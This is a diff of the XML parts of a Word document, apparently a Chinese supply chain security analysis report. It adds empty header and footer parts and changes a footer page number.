+<w:ftr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se wp14">
+  <w:p>
+    <w:pPr>
+      <w:pStyle w:val="aa"/>
+    </w:pPr>
+  </w:p>
+</w:ftr>
+</file>
+
+<file path=word/footer2.xml><?xml version="1.0" encoding="utf-8"?>
 <w:ftr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se wp14">
   <w:p>
     <w:pPr>
@@ -14007,7 +14343,7 @@
         <w:sz w:val="16"/>
         <w:szCs w:val="16"/>
       </w:rPr>
-      <w:t>3</w:t>
+      <w:t>16</w:t>
     </w:r>
     <w:r>
       <w:rPr>
@@ -14037,6 +14373,16 @@
 </w:ftr>
 </file>
 
+<file path=word/footer3.xml><?xml version="1.0" encoding="utf-8"?>
+<w:ftr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se wp14">
+  <w:p>
+    <w:pPr>
+      <w:pStyle w:val="aa"/>
+    </w:pPr>
+  </w:p>
+</w:ftr>
+</file>
+
 <file path=word/footnotes.xml><?xml version="1.0" encoding="utf-8"?>
 <w:footnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se wp14">
   <w:footnote w:type="separator" w:id="-1">
@@ -14063,6 +14409,16 @@
 </file>
 
 <file path=word/header1.xml><?xml version="1.0" encoding="utf-8"?>
+<w:hdr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se wp14">
+  <w:p>
+    <w:pPr>
+      <w:pStyle w:val="a8"/>
+    </w:pPr>
+  </w:p>
+</w:hdr>
+</file>
+
+<file path=word/header2.xml><?xml version="1.0" encoding="utf-8"?>
 <w:hdr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se wp14">
   <w:p>
     <w:pPr>
@@ -14093,6 +14449,16 @@
       </w:rPr>
       <w:t>供应链安全分析报告</w:t>
     </w:r>
+  </w:p>
+</w:hdr>
+</file>
+
+<file path=word/header3.xml><?xml version="1.0" encoding="utf-8"?>
+<w:hdr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se wp14">
+  <w:p>
+    <w:pPr>
+      <w:pStyle w:val="a8"/>
+    </w:pPr>
   </w:p>
 </w:hdr>
 </file>
